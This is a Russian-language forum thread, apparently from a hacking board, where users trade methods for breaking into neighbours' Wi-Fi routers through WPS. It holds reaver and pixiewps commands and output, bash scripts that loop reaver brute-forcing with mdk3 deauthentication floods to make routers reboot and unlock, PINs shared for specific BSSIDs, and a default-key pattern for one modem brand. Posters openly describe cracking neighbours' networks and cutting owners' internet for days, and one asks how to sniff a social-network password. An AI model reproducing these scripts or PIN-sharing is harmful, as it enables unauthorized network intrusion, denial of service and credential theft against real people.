pixiewps -e d1:79:07:73:0f:3b:79:82:97:95:95:5f:6f:11:ab:6b:3a :61:5b:79:6a:50:e3:b7:bc:be:cc:c8:a0:f8:dd:c8:d8:9 0:38:77:13:dd:d3:6b:1d:d3:07:74:f9:49:2e:60:f6:c0: 8e:c3:60:65:8f:a8:6e:2c:9c:a3:d7:74:a0:9d:0d:c7:cf :64:13:47:45:1c:88:21:3e:12:01:c3:a1:1b:a4:c7:d2:f 0:b6:2d:9c:f1:e1:4d:c4:c9:b7:78:6c:6d:81:36:33:94: 65:ec:8a:b0:59:c1:3a:6b:e5:b9:c2:18:aa:58:57:0c:36 :3e:3d:a3:cf:17:be:f4:30:12:ea:64:ca:7a:a6:32:32:f b:98:0f:eb:2b:06:f0:d7:77:54:2b:10:f0:ea:fe:2f:58: c3:04:aa:c7:a6:ba:a1:56:c1:5f:73:ad:be:37:1b:25:85 :9b:0b:46:1b:b7:4b:85:22:6e:bb:fb:72:f1:d0:fb:aa:3 b:b7:5b:e3:30:b7:cb:9d:0b -r 37:52:87:46:0d:43:a3:71:0b:68:e4:52:25:d9:93:22:3b :4e:db:a2:da:53:cf:5a:1c:9f:ae:c5:d8:5a:73:24:f6:0 9:01:b4:57:f8:ce:99:1c:e3:d9:8e:19:34:8c:11:9f:89: 82:d0:23:ff:7c:35:7f:18:fb:e4:f9:32:04:b4:17:8c:e5 :e1:3a:41:b4:54:88:02:2e:42:09:23:9e:9a:8d:fd:2c:4 e:49:32:60:c4:49:af:05:22:f6:c5:8d:82:7e:d7:7d:6e: 54:ed:2f:59:d1:3c:ac:e1:06:40:41:08:36:b0:e7:c4:5d :b6:c4:33:32:71:99:7d:b9:bd:c9:52:d3:22:a8:0f:5e:5 1:61:b7:27:99:81:bd:4a:b4:fb:54:bf:91:11:df:4f:b4: a7:87:52:cb:fd:53:7a:d7:14:ce:7b:98:d6:e3:2e:e4:ae :67:4a:74:9b:07:96:d9:46:a6:19:0c:a6:63:68:db:cf:5 9:75:d8:0e:b1:7d:4a:47:62 -s ea:c3:41:08:70:0b:4e:44:3a:39:1a:f0:f6:ab:95:33:ee :26:e0:50:ac:5d:2b:61:69:79:24:69:e5:71:8d:6b -z 80:0d:b7:c1:e6:e5:03:c1:49:53:94:f7:b1:95:dd:62:56 :a7:ce:25:9c:66:95:6c:0c:a2:bf:9a:18:ff:0c:31 -a 64:48:94:af:66:93:f1:6f:aa:d6:bf:33:92:0b:e0:9a:a0 :9c:be:36:a5:bc:15:80:e5:cb:40:2d:62:60:88:f5 -n 38:52:3f:cf:bc:bf:0b:d8:33:4d:23:cf:ac:e3:c4:00
Аналогично, недавно появился, скорее всего с последней прошивкой
Ранее был в поле видимости похожий, но он все-таки поддался с 30-50 попыток
Да, в моем случае роутер тоже новый, только недавно появился. Насчет 30-50 попыток попробую затестить, просто WPS отключается (именно отключается, а не лочится) после нескольких неудачных попыток. Кстати говоря, раньше тоже не всегда с первой попытки пин находился. Частенько со 2-3 только.
но он все-таки поддался с 30-50 попыток
Закидал deauth пакетами и добился того, чтобы его еще пару раз ребутнули. В итоге pixiewps атака проканала. Интересная картина получается.
А самое смешное, что это оказался обычный 24-bit PIN
картина может быть обычной если учитывать возможные состояния исследуемого роутера. может у самого пользователя работает кое как по ряду причин, проблемы с питанием и т.д.
Anton91x
11.11.2016, 00:00
Да, в моем случае роутер тоже новый, только недавно появился. Насчет 30-50 попыток попробую затестить, просто WPS отключается (именно отключается, а не лочится) после нескольких неудачных попыток. Кстати говоря, раньше тоже не всегда с первой попытки пин находился. Частенько со 2-3 только.
Если отключается, значит старая прошивка 2.00-2.03
Лочится они начинают от 2.04 и выше
Anton91x
11.11.2016, 00:07
Если не блокируется, то поставить на вечный перебор пина 00000000.
Авось хозяин кнопочку нажмёт.
Ну это как то не серьезно
А долбить его mdk3 в это время вам религия не позволяет?
Включить атаку дня на два
У хозяина пропадет интернет
Тогда уж точно нажмет, будет давить на все кнопки
Так можно взломать любой роутер с включенным wps
Да и зачем 00000000
Просто из под винды 7,8 или 10 пытаемся подключиться и ждем пока нажмут
Anton91x
11.11.2016, 01:08
Подскажите пин к ADSL роутеру D-Link DSL-2640U, прошивка с большой вероятностью от ростелекома 2.5.3, BSSID 90:8D:78:B5:35:04? Статичные пины длинка перепробовал. Роутер лочится до перезагрузки после 10 неверных пинов даже если их перебирать с интервалом в час.
Я как то взламывал D-Link DSL-2640U и тоже от провайдера ростелеком, по-моему pin начинался на 38, но я его не помню, попробуйте подобрать 3 и 4 цифру
Попробуйте еще 31957199, 21464065
binarymaster
11.11.2016, 01:24
Ну это как то не серьезно
А долбить его mdk3 в это время вам религия не позволяет?
В том посте речь шла о моделе роутера, который в принципе не принимает пин коды, только при нажатой кнопке WPS принимает код 00000000.
Тогда уж точно нажмет, будет давить на все кнопки
От долбёжки маловероятно, что кто-то нажмёт кнопку, только перезагружать будут. Сужу по опыту.
Просто из под винды 7,8 или 10 пытаемся подключиться и ждем пока нажмут
Это что-то новенькое.
Если отключается, значит старая прошивка 2.00-2.03
Лочится они начинают от 2.04 и выше
v2.02(AAKV.1)A4 была в моем случае
binarymaster
11.11.2016, 11:02
я к своему роутеру так подключался
Само собой... но мы тут чаще обсуждаем общие случаи, когда физического доступа к кнопке нет.
Triton_Mgn
11.11.2016, 11:23
Vfrcbv
Само собой... но мы тут чаще обсуждаем общие случаи, когда физического доступа к кнопке нет.
Максимум рубильник
basil1949
11.11.2016, 11:50
Кто-нибудь сталкивался с точкой доступа на Androide (имя роутера Android_4816, так показывает программа WiFiInfoView). WPS присутствует. Можно ли её сломать при помощи WPS-инструментария. У меня не получилось. В лучшем случае всё заканчивалось бесконечным повторением...
DSL2650NRU
11.11.2016, 21:29
Я как то взламывал D-Link DSL-2640U и тоже от провайдера ростелеком, по-моему pin начинался на 38, но я его не помню, попробуйте подобрать 3 и 4 цифру
Попробуйте еще 31957199, 21464065
Спасибо за ответ. Эти пины я тоже уже попробовал. Я нашел только одну точку с похожим маком в базе 3wifi и ее wps пин ни на какие алгоритмы не похож и не статический. Наверно росийские инженеры длинка читают античат
"КАРТИНКИ РОУТЕРОВ"
парсер картинок Google по ключевому слову ( 170кб -маленькая)
http://rgho.st/7QfJVVCYm
Роутеры.
Девочки.
Любые ФОТО.
Anton91x
14.11.2016, 20:07
Спасибо за ответ. Эти пины я тоже уже попробовал. Я нашел только одну точку с похожим маком в базе 3wifi и ее wps пин ни на какие алгоритмы не похож и не статический. Наверно росийские инженеры длинка читают античат
Я не знаю что они там читают
Я скачивал инструкции по настройке роутеров DSL-2640U, DSL-2750U, DSL-2500U и др.
С официального сайта D-Link
Там все в картинках (скриншоты веб морды)
Там видны пины. И эти пины подходят к Длинкам
Не думал что разработчики настолько...
Anton91x
14.11.2016, 20:09
"КАРТИНКИ РОУТЕРОВ"
парсер картинок Google по ключевому слову ( 170кб -маленькая)
http://rgho.st/7QfJVVCYm
Роутеры.
Девочки.
Любые ФОТО.
СПАМ!
ПО ССЫЛКЕ ТРОЯН
saimonyz
14.11.2016, 21:21
кто нибудь решил проблему с
wps transaction failed (code 0x02) re-trying last pin ?
wps transaction failed (code 0x03) re-trying last pin ?
wps transaction failed (code 0x04) re-trying last pin ?
кто нибудь решил проблему с
wps transaction failed (code 0x02) re-trying last pin ?
wps transaction failed (code 0x03) re-trying last pin ?
wps transaction failed (code 0x04) re-trying last pin ?
- спроси у них:
https://code.google.com/archive/p/reaver-wps/issues
DSL2650NRU
14.11.2016, 22:52
Я не знаю что они там читают
Я скачивал инструкции по настройке роутеров DSL-2640U, DSL-2750U, DSL-2500U и др.
С официального сайта D-Link
Там все в картинках (скриншоты веб морды)
Там видны пины. И эти пины подходят к Длинкам
Не думал что разработчики настолько...
90:8D:78:B5:18:B4 ROSTELECOM_655F WPS 28616368 Вот эта точка из базы. Пин никак не привязывается к маку.
Anton91x
16.11.2016, 17:03
90:8D:78:B5:18:B4 ROSTELECOM_655F WPS 28616368 Вот эта точка из базы. Пин никак не привязывается к маку.
Я знаю
"КАРТИНКИ РОУТЕРОВ"
Результат Проверки
https://www.virustotal.com/ru/file/...fe25afcce938bba7757662f95e6ad78ed45/analysis/
СПАМ! ПО ССЫЛКЕ ТРОЯН
*Онлайн-антивирусы*
http://www.comss.ru/list.php?c=online_antivirus
binarymaster
19.11.2016, 17:15
От 36-bit PIN реальный пин меньше на величину X, которая линейно растет вместе с маком. В пределах старшего бита NIC от мака к маку X увеличивается на половину от разницы маков.
Ну это я знаю. Младший бит NIC просто не используется, обрезается при вычислении пина.
Помню я где-то прикреплял XLS файл с расчётами. Но алгоритм пока никто не нашёл, в качестве обходного пути Felis-Sapiens реализовал детектор линейных последовательностей.
basil1949
19.11.2016, 18:58
Можно ли разобраться с точкой доступа на Android ( так я думаю , 72 mbit/sec) ? WPS включен, но PixieWPS, GoyskriptWPS - не помогают ... Всё крутится вокруг M1 и M2 и ни с места.
DSL2650NRU
19.11.2016, 20:14
Вот тут это было:
https://forum.antichat.ru/posts/3895917
Я тоже пока не нашёл точки отсчёта, но она явно непостоянна. Вот тут некоторые мои вычисления по этому делу:
http://rghost.ru/7MgpCwFDH
Файл удален. Если можно, перезалейте пожалуйста.
binarymaster
19.11.2016, 21:02
Файл удален. Если можно, перезалейте пожалуйста.
http://rgho.st/7fBDBHWSJ
DSL2650NRU
19.11.2016, 21:25
http://rgho.st/7fBDBHWSJ
Спасибо! И последняя просьба - почему Вы считаете, что младший бит не используется при расчетах?
binarymaster
19.11.2016, 21:56
И последняя просьба - почему Вы считаете, что младший бит не используется при расчетах?
Деление на 2 равноценно битовому сдвигу вправо на 1 младший бит.
Здравствуйте, помогите пожалуйста подобрать пин wps.
WiFi-DOM.ru-0404
04:a1:51:5e:c0:8a
2462 MHz, CH. 11
[WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][WPS][ESS]
NETGEAR
Хендшейк никак не получается подобрать, спасибо.
binarymaster
21.11.2016, 02:43
Здравствуйте, помогите пожалуйста подобрать пин wps.
Try this: 16769212
lemonvoice
22.11.2016, 02:13
Доброго времени суток! Возникла проблема: происходит безошибочный перебор пинов wps, все хорошо, доходит примерно до 5% и зацикливается на receive timeout occurred. Сигнал при этом отличный. Если после этого начать заново с нуля, то уже и до 5% не доходит, а сразу появляется receive timeout occurred. Кто сталкивался или знает решение отпишитесь, пожалуйста. Возможно этот вопрос уже задавался, тогда не ругайтесь, а просто дайте ссылку.
На всякий случай: при всем этом использовался kali 1.1.0, реавер 1.4, адаптер tplink 7200, команды:
iwconfig
airmon-ng start wlan0
airmon-ng check kill
airodump-ng mon0
wash -i mon0 -C
reaver -i mon0 -c 11 -b mac -va -vv --dh-small --no-nacks
lemonvoice
22.11.2016, 14:26
Доброго времени суток! Возникла проблема: происходит безошибочный перебор пинов wps, все хорошо, доходит примерно до 5% и зацикливается на receive timeout occurred. Сигнал при этом отличный. Если после этого начать заново с нуля, то уже и до 5% не доходит, а сразу появляется receive timeout occurred. Кто сталкивался или знает решение отпишитесь, пожалуйста. Возможно этот вопрос уже задавался, тогда не ругайтесь, а просто дайте ссылку.
На всякий случай: при всем этом использовался kali 1.1.0, реавер 1.4, адаптер tplink 7200, команды:
iwconfig
airmon-ng start wlan0
airmon-ng check kill
airodump-ng mon0
wash -i mon0 -C
reaver -i mon0 -c 11 -b mac -va -vv --dh-small --no-nacks
Пробовал команду: "while true; do timeout -s SIGINT 80s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 5; timeout 20s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 250 -m; sleep 20; done;"
но ТД не перезагрузилась, какие параметры в этой команде изменить, чтобы усилить нагрузку на ТД, чтобы все-таки привести ее к перезагрузке
lemonvoice
22.11.2016, 16:43
Пару дней назад сломал соседа TP-Link который был в локе пол года. Мне в личку написал 4pips за что ему большое СПАСИБО, и дал скрипт с помощью которого он ломал TP-Link_и при помощи mdk3.
Вот его код:
#!/bin/sh
while true;
# Run reaver to work 50s
do timeout -s SIGINT 50s reaver -i mon0 -b 64:66:B3:AC:XX:XX -N -S -L -s /etc/reaver/6466B3ACXXXX.wpc -v;
sleep 4;
# Run mdk3 to work 10s
echo [+] Mdk3 is working ...
timeout 10s mdk3 mon0 a -a 64:66:B3:AC:XX:XX -m &>/dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C] ;
sleep 24;
done;
У меня он не заработал и я его переделал:
#!/bin/bash
while true;
# Run reaver to work 10 pin
echo
echo
echo [+] reaver is working ...
do
reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -g 10 -s /etc/reaver/10FEED5AXXXX.wpc;
# Run mdk3 to work 3s
echo
echo
echo [+] Mdk3 is working ...
gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
sleep 3;
killall mdk3 2> /dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
sleep 14;
done;
и меньше чем за сутки взломал эту сеть!
sleep 3 - это сколько секунд шарашит mdk3
sleep 14 - пауза до появления точки в эфире
-g 10 - сколько пинов перебирать
Точка от меня через перекрытие и я поставил подбор на 10 пинов но если при подборе были ошибки то reaver зависал и надо было нажать ctrl+c.
Скорость перебора reaver была 2 пина в секунду + пауза + работа mdk3 + поиск точки reaverom по каналам = 48 - 50 секунд на 10 пинов.
Эти скрипты прописывать одной строкой? (в смысле одной командой разом). Если да, то как это будет выглядеть? Заранее спасибо и извиняюсь за небольшой флуд в теме
Подскажите пин для ZTE zxhn h118n mac 78:96:82:79:FE: D9
а кто тестил
AUTOPIXIEWPS?в чём отличие от просто PIXIEWPS?это новинка какая то,в посденим wifi slax уже присутствует...
henri2002
29.11.2016, 00:22
а кто тестил
AUTOPIXIEWPS?в чём отличие от просто PIXIEWPS?это новинка какая то,в посденим wifi slax уже присутствует...
судя по названию автоматом все сети проверяет, в аирслаксе тоже такая фишка есть.
т
судя по названию автоматом все сети проверяет, в аирслаксе тоже такая фишка есть.
а не,этот скрипт и так всё автоматом делает,фишка в чём то другом
Triton_Mgn
29.11.2016, 01:21
т
а не,этот скрипт и так всё автоматом делает,фишка в чём то другом
в пизду тебя все ждали, что поумнеешь. Linset? Опять арабские морды
binarymaster
29.11.2016, 01:25
тебя все ждали, что поумнеешь.
Не-не, мы все просто ждали, а этого никто не ждал.
Здравствуйте, помогите пожалуйста подобрать пин wps
mts_42184
1C:5F:2B:9A:27:E2
Зарание спасибо
посоветуйте пожалуйста как подобрать пин на ZTE ZXHN H298N BSSID: C4:A3:66:63:C7:E0
reaver -i wlan0mon -b C4:A3:66:63:C7:E0 -c 1 -a -vv?
Здравствуйте, помогите пожалуйста подобрать пин wps:
E8:94:F6:42:B1:C4
00:06:31:80:E4:47
70:9F:2D:97:26:B0
90:67:1C:8D:66:A0
A0:F3:C1:AD:B4:32
C8:3A:35:08:B1:98
Привет, подскажите пин пожалуйста.
40:4a:03:77:af:09
Zyxel keenetic 4g
Привет, подскажите пин пожалуйста.
40:4a:03:77:af:09
Zyxel keenetic 4g
попробуй:78435933
Кстати сегодня тоже 12 значный пароль ростелекомовский через airodump показало . Давно хотел взломать .но здесь никто такие не перебирает . Просто обратил внимание на 12 значное число справа где обычно ssid показывает . И реально подошел . Не знаю как airodump работает но факт есть факт
попробуй:78435933
Не прошёл(
Народ . Все интересна тема про airodump. http://rgho.st/private/8qYQbT7qd/8b5d4e1e4d7733eadc4f5b970ad5d714 .
Вот он сам показывает реальные пароли ... И это не единичный случай . Еще показывал пароль XLHA3XWP что тоже похоже на дефолтный пароль ростелекома. Может есть тут какая то закономерность ?
На вопрос не отвечу.У меня тоже так частенько бывало.Но пароль ни разу не подошёл.А у людей подходили.
Ну а вообще,явление довольно интересное.Возможно,связан о с каким-то косяком в WPA.А может с чем нибудь другим.
Я как-то пытался гуглить эту тему,но ничего интересного не нашёл.
Кто-то из олдовых здесь высказывал предположение.Что скорее всего это происходит из-за того,что
при подключении к точке,люди по ошибке или незнанию,вводят вместо ESSID,пароль WPA.
А дивайсы на Android,как известно,запоминают это дело.Вот и отсвечивают в эфире пассом.
Хотя мне непонятно,зачем на Android,вводить ESSID.Ну только если к скрытой сети.
На вопрос не отвечу.У меня тоже так частенько бывало.Но пароль ни разу не подошёл.А у людей подходили.
Ну а вообще,явление довольно интересное.Возможно,связан о с каким-то косяком в WPA.А может с чем нибудь другим.
Я как-то пытался гуглить эту тему,но ничего интересного не нашёл.
Кто-то из олдовых здесь высказывал предположение.Что скорее всего это происходит из-за того,что
при подключении к точке,люди по ошибке или незнанию,вводят вместо ESSID,пароль WPA.
А дивайсы на Android,как известно,запоминают это дело.Вот и отсвечивают в эфире пассом.
На вопрос не отвечу.У меня тоже так частенько бывало.Но пароль ни разу не подошёл.А у людей подходили.
Ну а вообще,явление довольно интересное.Возможно,связан о с каким-то косяком в WPA.А может с чем нибудь другим.
Я как-то пытался гуглить эту тему,но ничего интересного не нашёл.
Кто-то из олдовых здесь высказывал предположение.Что скорее всего это происходит из-за того,что
при подключении к точке,люди по ошибке или незнанию,вводят вместо ESSID,пароль WPA.
А дивайсы на Android,как известно,запоминают это дело.Вот и отсвечивают в эфире пассом.
Вот только это уже слишком часто случается . И куда можно вводить пароль вместо Essid . Точнее вообще куда нужно вводить ESSID ? вот это непонятно . Просто обычные пользователи как мои соседи , которые 100% не занимаются такими вещами как я ) там просто некому ) вот куда им нужно ввести Essid ? А вместо этого они вводят пароль ? )) Причем в этой теме уже писали про это ) про то что точек пять чтоли взомали ...
Это юзеры чудят, набирая не то и не туда. Сам с таким встречался.
http://s018.radikal.ru/i527/1612/7d/dc63155d2a1c.jpg
Это юзеры чудят, набирая не то и не туда. Сам с таким встречался.
http://s018.radikal.ru/i527/1612/7d/dc63155d2a1c.jpg
Так дело в том что . Есть люди которые набирают то и туда ) что потом airodump выдает их пароли ... Все же сомневаюсь в случайности ...
Так дело в том что . Есть люди которые набирают то и туда ) что потом airodump выдает их пароли ... Все же сомневаюсь в случайности ...
А откуда такая уверенность,что набирают то,и туда?
Да уж слишком часто просто ...
На 169 странице тоже писали . Что 5 точек так взломали ...
Да уж слишком часто просто ...
Ну это ведь ничего не доказывает.Не разбирающихся в этих делах людей,намного больше чем тех,кто хоть что-то знает.
Возьми для примера,хоть своих друзей,знакомых.Вот у меня,например много знакомых.Но только один из них,сможет самостоятельно настроить свой роутер.
Что 5 точек так взломали
Ну "взломали" то наверное громко сказано.
Ну "взломали" то наверное громко сказано.
Ну так то да )
Возможно это срабатывает на скрытых точках. При подключении выскакивает окошко где сначала просят ввести Имя точки и видимо неопытные вводят пароль вместо essid.
Да нет . Конкретно моя точка всегда была в поле зрения )
зарегистрировался чтоб у всезнающего Сержа32 спросить: ты что за человек такой?
sasha_mn
10.12.2016, 12:41
замечено, у кабельного модема Upvel d4:bf:7f wpa key по умолчанию = mac +3
пример mac- d4:bf:7f:04:1f:60 key - d4bf7f041f63
binarymaster
10.12.2016, 13:28
замечено, у кабельного модема Upvel d4:bf:7f wpa key по умолчанию = mac +3
пример mac- d4:bf:7f:04:1f:60 key - d4bf7f041f63
Факт. Но это не относится к уязвимостям в протоколе WPS.
Здравствуйте, подскажите пожалуйста пин к ZyXEL Keenetic GIGA
CC-5D-4E-DA-43-5E
В программе Dumpper показывает пин 43040940, но он не подходит
И что значит зеленая надпись SI?
http://pixs.ru/showimage/1jpg_7519391_24392221.jpg
В списке точек на всех красные точки, а на этой синяя
http://pixs.ru/showimage/2jpg_5981551_24392537.jpg
fire-dance
12.12.2016, 21:06
Здравствуйте, подскажите пожалуйста пин к ZyXEL Keenetic GIGA
CC-5D-4E-DA-43-5E
В программе Dumpper показывает пин 43040940, но он не подходит
И что значит зеленая надпись SI?
http://pixs.ru/showimage/1jpg_7519391_24392221.jpg
В списке точек на всех красные точки, а на этой синяя
http://pixs.ru/showimage/2jpg_5981551_24392537.jpg
si - это доступ к алгоритму подбора пин он подходит и то что синим значит что пин код верен может у вас слаб сигнал?
qwertys76
12.12.2016, 21:21
у меня под линуксом так ничего и не вышло. не смог установить драйвера на карту. да собственно под виндой уже привык . удобно да и комп не занят .можно другими делами заниматься
fire-dance
12.12.2016, 21:25
Здравствуйте, подскажите пожалуйста пин к ZyXEL Keenetic GIGA
CC-5D-4E-DA-43-5E
В программе Dumpper показывает пин 43040940, но он не подходит
И что значит зеленая надпись SI?
http://pixs.ru/showimage/1jpg_7519391_24392221.jpg
В списке точек на всех красные точки, а на этой синяя
http://pixs.ru/showimage/2jpg_5981551_24392537.jpg
также возможно пин сменили вручную
когда уже pixiewps будет подходить вообще ко всем точкам?а то как то неинтересно,мало точек,которые подходят для pixiewps,вот мне нужно Atheros открыть,а на него pixiewps не действует,хотя все хешы отдаёт....странно,если все хешы отдаёт,чего пин не вычисляеться....?
binarymaster
18.12.2016, 23:50
странно,если все хешы отдаёт,чего пин не вычисляеться....?
Там не только хеши, в частности там Nonce - последовательности псевдослучайных байтов. Уязвимы к атаке те, которые некачественно сгенерированы (предсказуемы).
Было бы странно, если бы точка их не отдавала. Всё в рамках протокола.
Там не только хеши, в частности там Nonce - последовательности псевдослучайных байтов. Уязвимы к атаке те, которые некачественно сгенерированы (предсказуемы).
Было бы странно, если бы точка их не отдавала. Всё в рамках протокола.
тогда зачем в pixie wps ключ -P?(типа на м3 пакете делает петтлю,как то так описано)чьл просто даёт этот ключ?кстати и ключ -W 2 тоже к определённым точкам походит,хотя даже от тп линка показывает якобы правильный пин(ну типа есть пины с минусом,а один всегда с плюсом,а так всё равно не верный)
DSL2650NRU
19.12.2016, 18:27
тогда зачем в pixie wps ключ -P?(типа на м3 пакете делает петтлю,как то так описано)чьл просто даёт этот ключ?кстати и ключ -W 2 тоже к определённым точкам походит,хотя даже от тп линка показывает якобы правильный пин(ну типа есть пины с минусом,а один всегда с плюсом,а так всё равно не верный)
Ключ -P для того, чтобы не лочить точки при работе с pixiewps.
Ключ -P для того, чтобы не лочить точки при работе с pixiewps.
так тогда нет и перебора пинов,если -P поставить,так как приходят пакеты м1 и м2,а ведь полноценный перебор,это когда и м3 и м4 пакеты.Ну не лоситься точка ну и толку с этого,перебора пинов же нет....
DSL2650NRU
20.12.2016, 07:31
так тогда нет и перебора пинов,если -P поставить,так как приходят пакеты м1 и м2,а ведь полноценный перебор,это когда и м3 и м4 пакеты.Ну не лоситься точка ну и толку с этого,перебора пинов же нет....
Ривер с пикси (-K 1) и ривер-перебор пинов - это как кислое и теплое. Немного разные вещи. Ключ -P есть смысл использовать только для получения хэшей и Nonce - последовательностей и при этом не тратить попытки до лока.
Ривер с пикси (-K 1) и ривер-перебор пинов - это как кислое и теплое. Немного разные вещи. Ключ -P есть смысл использовать только для получения хэшей и Nonce - последовательностей и при этом не тратить попытки до лока.
так а для чего получать хешы и Nonce, вернее много хешей и много Nonce ?я так понял,что нужны самые первые хешы,что бы в offline вычислить пин,а если поставить -P,то просто будет много хешей,ну и что дальше то делать?каждый хеш что ли проверять?
binarymaster
21.12.2016, 00:48
так а для чего получать хешы и Nonce, каждый хеш что ли проверять?
Они имеют смысл только все вместе. Глянь спецификацию протокола WPS.
Triton_Mgn
21.12.2016, 00:56
Пол года плохая погода, нонсенс
Был же примерный пример на tp-link 841
Они имеют смысл только все вместе. Глянь спецификацию протокола WPS.
та я знаю,что нужны все вместе,просто для чего конкретно -Р?ну вот я сейчас такой ключ задал,ну работает ривер,заваливает хэш за хэшем,ну и что.....дальше то что,что с этим делать?та и ключ -К 1 подходит к определённым чипсетам,а так вообще смысла -К 1 нет,если чипсет не подходящий,ривер сразу покажет,что пин не найден и прога остановится,а без -К 1,но с -Р просто собираются хешы и тд.....просто дальше то что с ними делать....?
Кстати,какие ещё полезные ключи подставить нужно?ну вот -f эффективно?типа форсаж перебора или как то так....
Пол года плохая погода, нонсенс
Был же примерный пример на tp-link 841
та тп линки на атерос вообще не ломаемы с pixiewps,там пофиг какие ключи прописывать...
binarymaster
21.12.2016, 02:18
а без -К 1,но с -Р просто собираются хешы и тд.....просто дальше то что с ними делать....?
Экспериментировать. Удобно же, и Wireshark запускать не надо.
Экспериментировать. Удобно же, и Wireshark запускать не надо.
ну как именно?можно подробней написать,как эксперементировать?все хешы просто проверять?так это долго,так тысячи хешей насобирать можно....
binarymaster
21.12.2016, 02:41
ну как именно?можно подробней написать,как эксперементировать?все хешы просто проверять?
Каждый экспериментирует по-своему, в рамках своих умений, знаний, идей и размышлений.
Здесь нельзя сказать конкретно, что делать с ними.
Пацы такой вопрос надо очень провернуть у меня мак раздает вай как мне засниффить пароль вк ?
кстати,кто пробовал в pixiewps поставить ключ -P .насобирать десяток разных хешей и потом их прогнать?просто неудобно эти хешы подставлять,долго......может автоматическое что то уже есть,не?
а алгоритм wps для tplink еще нету?
Еще нету, да и никто им не занимается, по крайней мере не слышал ничего об этом.
tihan2007
23.12.2016, 23:23
Доброе время суток, прошу помощи, интересует WPS PIN для роутера TOTOLINK N300RT 78:44:76:A3:96:3C. Был использован 07208287 | 24-bit PIN и pixiewps результат нулевой, какие еще возможны варианты?
binarymaster
23.12.2016, 23:47
результат нулевой, какие еще возможны варианты?
И неудивительно, потому что вы не воспользовались генератором WPS PIN на сайте 3WiFi.
Пробуйте 01042702 и 99956042.
tihan2007
24.12.2016, 00:24
Им и пользовался, только не те пины это понятно 99956042 | Static PIN - Onlime, а этого нет в Оффлайн генераторе 01042702? P.S.: понял 01042702 это Static PIN 01042702 90%
Доброй ночи, господа!
Немного предыстории ) началось все с того что соседи сменили пороль от вай фая. Проблем особых не составило взломать их повторно, благо лазейку я себе оставил включив WPS. (благо не шарят). Что их понудило на это... пользовался ихней сетью в исключительно редких случаях.
Ну ладно поехали дальше... Наткнулся я на очередного соседа с вкл WPS, роутер MGTS_GPON **** о думаю счастье привалило как бы не так, столкнулся с проблемой
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
Ну думаю все доигрался ( попробывал следующую комнду
reaver -i wlan0mon -b 94:4A:0C:40:40:9D -a -vv -L -K 1 вроде дело пошло но как мне кажется все стоит на месте результат
[P] WPS Manufacturer: SERCOMM
[P] WPS Model Name: RV6688BCM
[P] WPS Model Number: RV6688BCM
[P] Access Point Serial Number: 53434F4D14181906
[+] Received M1 message
[P] R-Nonce: 37:e6:e2:c8:67:22:b1:20:80:40:3b:2e:e5:c3:f6:86
[P] PKR: bc:de:1f:4e:ba:8e:b4:65:f4:78:0a:c7:d4:2c:85:9d:e0 :af:d5:6f:d4:ed:cf:74:b0:47:d8:20:b3:52:cb:f2:a2:8 b:90:46:68:06:ce:fc:c9:a2:f7:2f:a3:9c:07:90:d9:86: 71:43:fe:47:12:c1:19:8c:44:98:40:77:a0:12:a8:c1:6b :b5:28:bc:cf:dd:c7:89:3b:53:ae:05:0b:cf:18:a6:a3:4 a:14:d6:6d:d0:e5:a1:16:b9:4b:58:ac:49:8d:19:42:b4: 1a:c8:f2:9f:ed:57:a7:17:8f:be:97:7a:ab:c0:10:5a:e8 :14:49:fa:7a:fd:5e:b8:ea:37:9b:19:a2:bf:3d:da:86:f b:40:5b:99:33:4b:90:8d:33:62:26:36:96:ec:bd:ad:05: a1:01:61:53:41:bb:41:30:ca:ba:df:2e:a1:bf:c4:71:5a :33:3a:00:42:43:5b:63:dd:6a:c2:db:b5:07:0c:0d:5f:f a:7a:38:de:0f:73:d2:28:98
[P] AuthKey: 9a:96:cf:56:50:36:9f:14:2e:8f:fb:87:fe:f6:83:86:21 :84:d6:f0:99:1b:a3:78:d1:f4:c8:9b:a5:b8:a2:8e
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 88885674.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 0b:f4:96:98:4c:4d:eb:70:3c:8b:7f:5e:65:8d:f2:c4
[P] PKE: b3:7a:64:b3:1d:73:26:b1:4c:db:a7:f9:c6:c0:0f:fa:38 :1e:31:39:0f:96:b4:c6:eb:3d:03:fd:84:1e:82:8d:5b:c 9:a3:c3:42:2d:d5:d9:3e:a9:8c:7f:41:66:38:90:d9:b7: 8d:5b:23:88:d6:ea:d0:73:40:d3:23:f4:f3:e2:b1:5e:ea :3b:57:b0:3c:24:10:1d:54:36:15:ea:34:8a:65:a6:d2:7 9:e2:78:72:dd:f6:99:4b:68:3e:1c:e6:f3:c6:37:56:c5: 7b:37:43:9e:06:13:b7:ba:5e:ea:06:ae:dd:7b:a7:0b:3c :8e:25:1e:11:e9:26:a4:ba:eb:ae:60:54:ae:8e:c7:21:8 3:9a:c9:1e:d6:eb:9f:08:ab:8b:1e:66:11:ac:e8:d6:b8: ed:de:ef:86:0b:bc:17:cc:d1:c3:a7:9a:a5:67:49:ee:e1 :5c:3e:2a:c3:2b:8c:47:74:95:14:e3:f6:c6:62:72:00:5 1:84:d8:6c:a8:d1:48:af:c3
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Меня смущает:
[+] Trying pin 88885674.
[+] 0.09% complete.
гонял около 2 часов процесс и пин стоит на месте
Сильно не ругайте я зеленый еще! скопировал минимум .
подрузамеваю что роутер залочен как разлочить неужели рубильник ) ?
Еще вопрос можно ли хеншейк прогнать по словарю на пин, а пин прогнать через ривер) ?
К дополнению, потестил на своем роутере MGTS_GPON **** интсрумент mdk3, к сожалению нужно находиться в непосредственной близостик к роутеру из за слабого сигнала карточки в ноутбуке мощность которую повысить нельзя( обидно .
